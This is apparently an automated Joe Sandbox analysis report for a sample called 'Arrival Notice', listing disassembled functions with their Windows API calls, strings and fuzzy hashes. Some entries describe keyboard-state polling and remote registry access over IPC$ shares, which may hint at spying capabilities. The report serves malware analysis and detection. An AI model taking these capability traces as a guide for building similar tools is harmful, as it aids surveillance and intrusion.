Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 455036304-4153970271
Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9

Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON

Download Yara Rule

APIs

SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
_memmove.LIBCMT ref: 00467EB8
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
_memmove.LIBCMT ref: 00467F6C
SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB

Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651

SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
String ID:
API String ID: 2170234536-0
Opcode ID: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
Opcode Fuzzy Hash: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A

Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00453CE0
SetKeyboardState.USER32(?), ref: 00453D3B
GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
GetKeyState.USER32(000000A0), ref: 00453D75
GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
GetKeyState.USER32(000000A1), ref: 00453DB5
GetAsyncKeyState.USER32(00000011), ref: 00453DE1
GetKeyState.USER32(00000011), ref: 00453DEF
GetAsyncKeyState.USER32(00000012), ref: 00453E18
GetKeyState.USER32(00000012), ref: 00453E26
GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
GetKeyState.USER32(0000005B), ref: 00453E5D

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65

Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 004357DB
GetWindowRect.USER32(00000000,?), ref: 004357ED
MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
GetDlgItem.USER32(?,00000002), ref: 0043586A
GetWindowRect.USER32(00000000,?), ref: 0043587C
MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
GetDlgItem.USER32(?,000003E9), ref: 004358DC
GetWindowRect.USER32(00000000,?), ref: 004358EE
MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
GetDlgItem.USER32(?,000003EA), ref: 00435941
MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
InvalidateRect.USER32(?,00000000,00000001), ref: 00435967

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54

Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 004714DC
LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
DeleteObject.GDI32(?), ref: 0047151E
DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
DeleteObject.GDI32(?), ref: 004715EA
DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
String ID:
API String ID: 3218148540-0
Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768

Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 0043379C
_wcscpy.LIBCMT ref: 004337AA
__wsplitpath.LIBCMT ref: 004337D8
__wsplitpath.LIBCMT ref: 004337FA
_wcscpy.LIBCMT ref: 0043381E
_wcscpy.LIBCMT ref: 0043383D
_wcscpy.LIBCMT ref: 0043384D
_wcscat.LIBCMT ref: 0043385A
_wcscat.LIBCMT ref: 004338B4
_wcscat.LIBCMT ref: 004338EA
_wcscat.LIBCMT ref: 004338FA

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5

Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 00467490
_wcsncpy.LIBCMT ref: 004674BC

Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182

_wcstok.LIBCMT ref: 004674FF

Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE

_wcstok.LIBCMT ref: 004675B2
GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
_wcslen.LIBCMT ref: 00467793
_wcscpy.LIBCMT ref: 00467641

Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193

_wcslen.LIBCMT ref: 004677BD
GetSaveFileNameW.COMDLG32(00000058), ref: 00467807

Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8

Strings

X, xrefs: 00467696

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
String ID: X
API String ID: 3104067586-3081909835
Opcode ID: 7ba9371c5d14dc99d572c33c8cbfca120caa9698d8a5782008a2d5a8d0fa9561
Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
Opcode Fuzzy Hash: 7ba9371c5d14dc99d572c33c8cbfca120caa9698d8a5782008a2d5a8d0fa9561
Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A

Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0046CBC7
CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
CLSIDFromString.OLE32(?,?), ref: 0046CBF1
CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
_wcslen.LIBCMT ref: 0046CDB0
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
CoTaskMemFree.OLE32(?), ref: 0046CE42
CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85

Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7

Strings

NULL Pointer assignment, xrefs: 0046CEA6

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
String ID: NULL Pointer assignment
API String ID: 440038798-2785691316
Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00461056
GetWindowTextW.USER32(?,?,00000400), ref: 00461092
_wcslen.LIBCMT ref: 004610A3
CharUpperBuffW.USER32(?,00000000), ref: 004610B1
GetClassNameW.USER32(?,?,00000400), ref: 00461124
GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
GetClassNameW.USER32(?,?,00000400), ref: 004611A1
GetClassNameW.USER32(?,?,00000400), ref: 004611D9
GetWindowRect.USER32(?,?), ref: 00461248

Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9

Strings

ThumbnailClass, xrefs: 0046112F, 004611A8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
String ID: ThumbnailClass
API String ID: 4136854206-1241985126
Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7

Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
GetClientRect.USER32(?,?), ref: 00471A1A
RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
DestroyIcon.USER32(?), ref: 00471AF4

Strings

2, xrefs: 004719D9

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
String ID: 2
API String ID: 1331449709-450215437
Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55

Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
__swprintf.LIBCMT ref: 00460915
__swprintf.LIBCMT ref: 0046092D
_wprintf.LIBCMT ref: 004609E1

Strings

^ ERROR, xrefs: 00460983
%s (%d) : ==> %s: %s %s, xrefs: 004609DC
Line %d:, xrefs: 0046090F
Error: , xrefs: 004609AC

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
API String ID: 3054410614-2561132961
Opcode ID: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
Opcode Fuzzy Hash: 525672c6318f03bf5c80d6cc28fa1f1d99bb47d67e8ddb41e80830938e70613e
Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9

Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
CLSIDFromString.OLE32(?,?), ref: 004587B3
RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
RegCloseKey.ADVAPI32(?), ref: 004587C5

Strings

\IPC$, xrefs: 00458704
SOFTWARE\Classes\, xrefs: 00458680
\CLSID, xrefs: 00458698

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 600699880-22481851
Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94

Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00450CA0

Strings

static, xrefs: 00450C82

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: DestroyWindow
String ID: static
API String ID: 3375834691-2160076837
Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68

Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D959
GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B

Strings

Network, xrefs: 0045D9E6
RAMDisk, xrefs: 0045DA04
Fixed, xrefs: 0045D9D7
Removable, xrefs: 0045D9C8
CDROM, xrefs: 0045D9F5
\VH, xrefs: 0045D99B
Unknown, xrefs: 0045DA13

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

